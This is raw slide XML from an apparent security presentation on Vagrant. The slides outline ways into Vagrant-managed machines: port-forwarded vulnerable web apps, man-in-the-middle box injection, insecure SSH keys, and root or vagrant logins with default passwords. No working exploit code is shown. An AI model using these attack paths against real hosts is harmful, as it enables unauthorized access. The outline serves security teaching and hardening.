                <a:lnTo>
                  <a:pt x="18708" y="26847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15850" y="24053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14401" y="17970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14401" y="1638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461" y="19357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26784" y="49054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36923" y="49568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060912" y="47929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1070983" y="47929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1077968" y="49745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081854" y="53340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085715" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1087645" y="63487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1087645" y="79171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101958" y="79171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101958" y="63487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1103863" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107673" y="53340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111534" y="49745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118430" y="47929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155347" y="47929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2165485" y="47407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2191727" y="17725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2192190" y="6299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2192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59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17" y="190436"/>
            <a:ext cx="1971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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-285" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>EXPLOITATION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465" y="906424"/>
            <a:ext cx="974090" cy="187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3040">
              <a:lnSpc>
                <a:spcPct val="137800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Shared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Folders </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Defaults </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Exploitation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spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Recommendations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7198" y="968629"/>
            <a:ext cx="0" cy="1832610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1832610">
                <a:moveTo>
                  <a:pt x="0" y="183222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37739" y="1605457"/>
            <a:ext cx="11347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5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EXPLOITATION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60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189" y="190436"/>
            <a:ext cx="2656205" cy="2792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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-235" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-150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EXPLOITATION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865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Low </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Guest)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"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="315595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Port-Forwarding</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="455295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web-Application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-185" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Man </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the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Middle</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="455295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Box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100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Connection</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="455295">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Key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100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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455295">
              <a:lnSpc>
                <a:spcPts val="1195"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Finding Valid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Keys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100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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455295">
              <a:lnSpc>
                <a:spcPts val="1195"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Root </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Login </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>]*)</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="455295">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Login </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>]*)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</a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>*) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Depends </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Settings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spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(default/private/public)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61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589" y="190436"/>
            <a:ext cx="1624330" cy="1229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sz="1200" spc="-204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1200" spc="-170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BASICS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120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Init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100" spc="-204" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Command: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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>&lt;box&gt;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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>]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89" y="190436"/>
            <a:ext cx="2025650" cy="1697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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-280" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-150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EXPLOITATION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  <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>High </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Guest)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marL="302260" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="302895" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Root </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
